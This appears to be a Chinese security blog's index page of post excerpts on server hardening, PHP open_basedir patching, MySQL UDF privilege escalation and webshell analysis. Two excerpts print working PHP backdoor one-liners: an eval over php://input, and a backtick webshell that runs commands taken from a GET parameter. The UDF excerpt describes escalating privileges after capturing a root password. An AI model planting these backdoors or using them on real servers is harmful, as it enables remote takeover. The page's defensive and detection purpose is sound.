安全技术

修改php源码防止Webshell跨目录浏览文件(防跨站)

php的Webshell能够实现浏览网站目录、修改网站文件、数据库查询、修改、下载等等,做为个人工具可谓功能完善且强大,做为黑客工具可谓功能恐怖,危害极大!做网站需要在各个方面做好安全防御。

首先,修改PHP源码后重新编译PHP环境

tar zxvf php-5.2.14.tar.gz
gzip -cd php-5.2.14-fpm-0.5.14.diff.gz | patch -d php-5.2.14 -p1
cd php-5.2.14/
然后编辑文件main/fopen_wrappers.c,找到 php_check_open_basedir_ex 函数的定义部分,大约在 220行。在如下代码之后插入修改代码

» 阅读全文

关键词: 防跨站 , php

基于ubuntu 12.04的Linux服务器安全配置

linux的系统已经接触很久了,Linux服务器安全配置基本上也是东搞搞西搞搞,并没有形成一个体系。

这篇翻译linux安全技术的文章为 ubuntu 12.04.2 LTS 而写,你也可以在任何其他 Linux 分发版上做相同的事情。

如果服务器已经有了一个公有IP,你会希望立即锁定 root 访问。事实上,你得锁定整个ssh访问,并确保只有你可以访问。增加一个新用户,把它加入admin组(在/etc/sudoers预配置以拥有sudo访问权限)。

» 阅读全文

关键词: 安全技术 , ubuntu , linux

Mysql数据库提权:浅谈UDF的安全问题利用

一直比较关注服务器安全问题,最近和一个朋友探讨mysql的利用UDF提权问题。我们攻陷一个网站的时候拿到root密码,有时候不仅仅看看数据库,还可以做其他事情,甚至服务器提权哦。

譬如, 执行一条sql语句查看/etc/passwd文件的内容:

» 阅读全文

关键词: 网络安全 , mysql提权

Linux系统监控之ssh登陆自动139邮件短信提醒

linux系统监控之ssh登陆自动139邮件短信提醒

Linux系统监控非常重要,互联网的网络的安全是一个非常重要的问题,很多 时候,我们会出于安全考虑,希望服务器在有用户通过ssh登陆时能自动向管理员发送一条邮件,通知登陆用户名和IP。这是一种不错的安全防范机制,它可以 让管理员及时发现异常登陆,并在造成更大危害前(比如获得更高权限)阻止恶意访问。

这里要说明的是,包子使用139邮箱,因为,大家知道这个139邮箱邮件是有移动的短信提醒的。这里有个缺点就是频繁登录的话不断发送短信,这个可以做个一个IP列表即可。

这个脚本对于ssh安全监控非常有用,系统非法登陆都可以时时了解情况,及时保护服务器安全

邮件发送我们使用:sendemail-v1.56 详细可以看:http://www.jincon.com/archives/66/

» 阅读全文

关键词: 系统监控 , linux , sendemail

基于php://input一句话PHP木马后门的分析和利用

现在的人越来越不厚道了,不管是漏洞入侵者还是一些无良程序作者竟然在程序中植入非常隐蔽的后门,这次我发现的就是基于php://input一句话php木马后门。这也让想起曾经被发现的dedecms安装文件曾经出过被 植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)

植入的后门代码为:

@eval(file_get_contents('php://input'))

大家都知道eval这个函数太邪恶了,他可以把字符串作为PHP代码执行,搭配php://input简直是赤裸裸的后门啊,对于一般没有经验的管路员,即使看到了,可能都不被注意,那么php://input到底干嘛的呢?

初步发现php://input是用来接收post数据,就是这句话的意思是把post的数据通过file_get_content 获取到然后传递给eval执行php代码,到这里利用方法就知道了,更看出这段代码简直太邪恶了。

» 阅读全文

关键词: php木马 , 后门

分析一段PHP恶意代码,可以PHP免杀的一句话后门

分析一段php恶意代码,可以PHP免杀的一句话后门

大家PHP有个可执行符号:` ` ,这个符号是Esc 下面的一个键 感叹号!旁边的,问题就是这个符号。很恐怖的哦。

其实,通过echo `系统命令`; 可以达到system(); 一样的效果

我们看Php恶意代码,

//t.php

$test = $_GET['r']; echo `$test`;

大家看看这个代码有木有问题?$_GET['t']的变量可行了的。这样就可以制作PHP免杀的一句话后门。

http://www.yifen.com / t.php?r=dir 就可以列出目录,其他代码就照样OK滴。

如何查找PHP恶意代码呢,呵呵,通过查找,'echo `' 来查找。

关键词: 恶意代码 , 后门 , php

Ubuntu开机自启动ARP绑定mac地址,防止arp欺骗攻击

国内所谓的某知名机房,真是让人蛋疼,所谓的xxx防火墙都是摆设,机房还出现arp欺骗,没办法服务器安全太重要啦。。Linux和windows不同,windows相对linux的安全工具比较多点。

对于防止arp欺骗攻击,比较多的做法是:ARP绑定mac地址。但是怎么能让Ubuntu开机自启动ARP绑定mac地址呢?

地址:

/etc/rc.local

添加开机自动绑定:

代码:

arp -s xx.191.xxx.1 01:0f:e4:59:1e:06

OK,大概就这么多,通过偶管理服务器的经验,千万别相信一些所谓牛逼的机房,什么金盾xxx防火墙,高防集群,都是扯淡,关键是还是要增强自己的防范意识,从自己的主机做起。

关键词: arp欺骗攻 , 服务器安全

360给我的提供的Php通用SQL防注入代码

360提供的Php防注入代码

大家说不敢用

其实都开源了怎么就不敢用啦,,O(∩_∩)O哈哈~

大家看着用吧,挺不错的


    <?php     
    //Code By Safe3     
    function customError($errno, $errstr, $errfile, $errline)     
    {     
      echo "<b>Error number:</b> [$errno],error on line $errline in $errfile<br />" ;     
      die();     
    }     

» 阅读全文

关键词: sql防注入代码

Total: 10‹ Prev12